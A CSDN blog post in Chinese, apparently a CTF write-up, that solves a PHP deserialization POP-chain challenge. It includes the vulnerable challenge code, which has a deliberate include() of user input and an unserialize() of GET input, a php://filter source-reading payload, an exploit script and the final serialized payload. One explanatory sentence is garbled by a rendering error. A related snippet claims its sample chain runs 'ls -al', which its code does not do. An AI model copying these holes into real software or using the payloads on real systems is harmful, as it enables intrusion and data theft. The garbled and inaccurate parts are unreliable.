pop链1

最新推荐文章于 2024-07-31 09:50:42 发布
最新推荐文章于 2024-07-31 09:50:42 发布
阅读量272 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44047654/article/details/108794671
版权

pop链

题目

<?php 
error_reporting(0);
include("./try.php"); 
if(isset($_GET['fn'])){ 
    if(check_fn($_GET['fn'])){ 
    include($_GET['fn']); 
    } 
}else{ 
unserialize($_GET['code']); 
} 

highlight_file(__FILE__); 
?>

    题目中包含是try.php文件,所以我们考虑去读取他,
    使用PHP://filter 伪协议
    php://filter/read=convert.base64-encode/resource=try.php

try.php 文件

<?php  
    $test = "Hello world";
include "flag.php";
function check_fn($filename){
    $result = preg_match("/string|zlib|flag/i", $filename);
    if($result){
        return FALSE;
    }
    return TRUE;
}

class agood { 
    private $gooda; 
    public function __construct($file){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    function __wakeup(){ 
        $temp = $this->gooda . 'ctf'; 
    } 
} 

class bgood { 
    private $items = array(); 
    public function __toString() { 
        $item = $this->items; 
        $str = $item['ss']->sword; 
        return 'what the good?'; 
    } 
} 

class cgood { 
    private $params = array(); 
    public function __get($key) {  
        global $flag;
        $tmp = $this->params[$key];
        var_dump($$tmp); 
    }
}
?>

__wakeup():是调用反序列化是会触发,(绕过方法:使用序列化时将其中的变量数量与真实数量不符)

__toString():把类当作字符串使用时触发
__get:从不可访问的属性中读取数据会触发

解题思路:

首先对code进行传参使他执行反序列化触发__wakeup,执行过程中会将agood类里面的变量 g o o d a 与 字 符 串 拼 接 ( 将 gooda与字符串拼接(将 goodagooda当成的字符串),就触发了bgood类里面的__toString 方法,会调用数组中的ss键(KaTeX parse error: Expected group after '_' at position 35: …访问,于是执行了cgood中的_̲_get方法,获得key的值,将数组里面key键对应的值赋值个tmp变量params[$key],最后是一个变量覆盖,构造tmp=flag,就可以将flag的值覆盖

  <?php
  class agood{
      private $gooda;
      function __construct()
      {
          $this->gooda = new bgood();
      }
  
  }
 class bgood{
 
     private $items = array();
     function __construct(){
         $this->items = array("ss"=>new cgood());
     }
 }
 
 class cgood{
     private $params = array("sword"=>"flag");
 }
 echo serialize(new agood());
 ?>

O:5:"agood":1:{s:12:"agoodgooda";O:5:"bgood":1:{s:12:"bgooditems";a:1:{s:2:"ss";O:5:"cgood":1:{s:13:"cgoodparams";a:1:{s:5:"sword";s:4:"flag";}}}}}

由于变量都是私有的,所以需要在变量名之前加上%00类名%00
这里我们直接输出,%00是输出不出来的,所以手动加上

O:5:%22agood%22:1:{s:12:%22%00agood%00gooda%22;O:5:%22bgood%22:1:{s:12:%22%00bgood%00items%22;a:1:{s:2:%22ss%22;O:5:%22cgood%22:1:{s:13:%22%00cgood%00params%22;a:1:{s:5:%22sword%22;s:4:%22flag%22;}}}}}
吉吉_大王
关注
POP的构造
一个打渔的的博客K6uQ5H7^ff(R
04-04 4376
序列化与反序列化 序列化是为了方便于数据的传输,形象化理解就像物流的过程。你想把一张桌子通过从a–>b,一张桌子肯定不好运输,因此需要把它拆开(这个拆的过程就是序列化);等到达了b需要把他组装起来(装的过程就是反序列化)。 PHP中的魔术方法 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问...
POP学习
blue_fantasy的博客
01-09 717
Text. __wakeup() //使用unserialize时触发 __sleep() //使用serialize时触发 __destruct() //对象被销毁时触发 __call() //当程序调用到当前类中未声明或没权限调用的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //当程序调用一个未定义或不可见的成员变量时触发,请求类里不存在的属性则自动触发 __set() //当程序试图写入一个不存在或不可见的成员变量时触发 __isset()
POP
最新发布
qq_52579508的博客
07-31 563
1 : 如何控制你的对象里的成员属性的对象是那一个??2: 学习使用反推法。
[WEB]pop
qq_61109509的博客
04-17 611
文章目录魔法方法小技巧分析 学长给的一道题 魔法方法 __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数,session反序列化同样会调用 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set
php反序列化学习(中)--pop的构造
qq_75120258的博客
04-24 1029
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
pop php,POP
weixin_36409144的博客
04-01 526
在二进制安全领域,Return-oriented programming(ROP)是一种常用的绕过防护攻击方式。攻击者可以利用内存中已有的进程片段(称作gadgets),通过汇集这些进程片构建一个攻击途径(称作gadget chains)。在2009年,Esser提出这种代码复用产生攻击的思想在PHP系统中同样适用[1][2]。0x01 PHP对象注入攻击PHP对象注入攻击本质上属于一种代码复用技...
ThinkPHP 6.x反序列化POP(一)1
08-03
《深入理解ThinkPHP 6.x反序列化POP利用》 在网络安全领域,ThinkPHP作为国内广泛应用的PHP框架,其安全问题备受关注。本文将详细探讨ThinkPHP 6.x版本中的一个特定安全问题——反序列化POP的利用,帮助开发者...
ThinkPHP 6.x反序列化POP(三)1
08-03
在本文中,我们将探讨ThinkPHP 6.x框架中的一个安全问题,特别是关于反序列化和POP的利用。POP(Padding Oracle Poisoning Chain)是一种利用序列化漏洞进行攻击的技术,通常用于远程代码执行(RCE)。在...
php反序列化pop.html
07-25
php反序列化pop.html
pop构造
weixin_30414245的博客
12-21 572
class Person { private $name; private $sex; private $age; //__set()方法用来设置私有属性 function __set($property_name, $value) { echo "在直接设置私有属性值的时候,自动调用了这个 __set() 方法为私有属性赋值&...
POP入门
cxiaodi的博客
06-11 195
【代码】POP入门。
POP挖掘
萍水间人的小天地
02-19 287
Laravel mockery组件 exp: <?php namespace Illuminate\Broadcasting{ class PendingBroadcast { protected $event; protected $events; public function __construct($events,$event) ...
php中的pop构造
blackguest07的博客
03-02 1471
php中反序列化漏洞的原理,pop的构造。
PHP反序列化--pop
2302_79800344的博客
03-18 1442
pop知识是PHP反序列化模块不可或缺的组成部分
CTF-PHP反序列化漏洞3-构造POP
Eason_LYC安全白帽子的成长博客
05-08 2049
PHP反序列化攻击是一种常见的Web攻击,攻击者通过构造恶意的序列化数据,将其传递给目标服务器,从而导致服务器执行非预期的操作。而Pop则是一种利用PHP反序列化漏洞的攻击方式,可以在未授权的情况下执行任意代码。《CTF基础入门系列》专栏文章打破以往CTF速成或就题论题模式。采用系统讲解基础知识+入门题目练习+真题讲解方式。让刚接触CTF的读者真正掌握CTF中各类型知识点,为后续自学或快速刷题备赛,打下坚实的基础~
pop例题
zhhhb1005的博客
05-01 871
目录 例题 流程 exp pop就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 例题 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'...
POP实例解析学习
bin789456的博客
11-28 8249
写在前面 POP就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload,实战应用范围暂时没遇到,不过在CTF比赛中经常出现这样的题目,同时也经常与反序列化一起考察,可以理解为是反序列化的一种拓展,泛用性更强,涉及到的魔法方法也更多。 基本魔法方法 我用的代码如下: <?php class A{ public $a="hi"; public $b="no"; function __construct() {
PHP之序列化与反序列化(POP篇)
errorr0
03-11 5393
序列化与反序列化的进阶
php反序列化pop
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__destruct()的特性,通过构造一条对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,从而实现攻击目的。 下面是一个简单的POP示例: ``` class A { public $b; function __construct($b) { $this->b = $b; } function __wakeup() { if (isset($this->b)) { unserialize($this->b); } } } class B { public $c; function __construct($c) { $this->c = $c; } function __destruct() { if (isset($this->c)) { unserialize($this->c); } } } class C { public $cmd; function __construct($cmd) { $this->cmd = $cmd; } } $cmd = 'ls -al'; $c = new C($cmd); $b = new B(serialize($c)); $a = new A(serialize($b)); $payload = serialize($a); ``` 在上面的代码中,我们构造了三个类A、B、C,其中类A包含一个成员变量$b,类B包含一个成员变量$c,类C包含一个成员变量$cmd。我们通过构造一个对象引用,使得在对象被反序列化时,依次调用每个对象的__wakeup()和__destruct()方法,最终执行$cmd变量中存储的命令。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值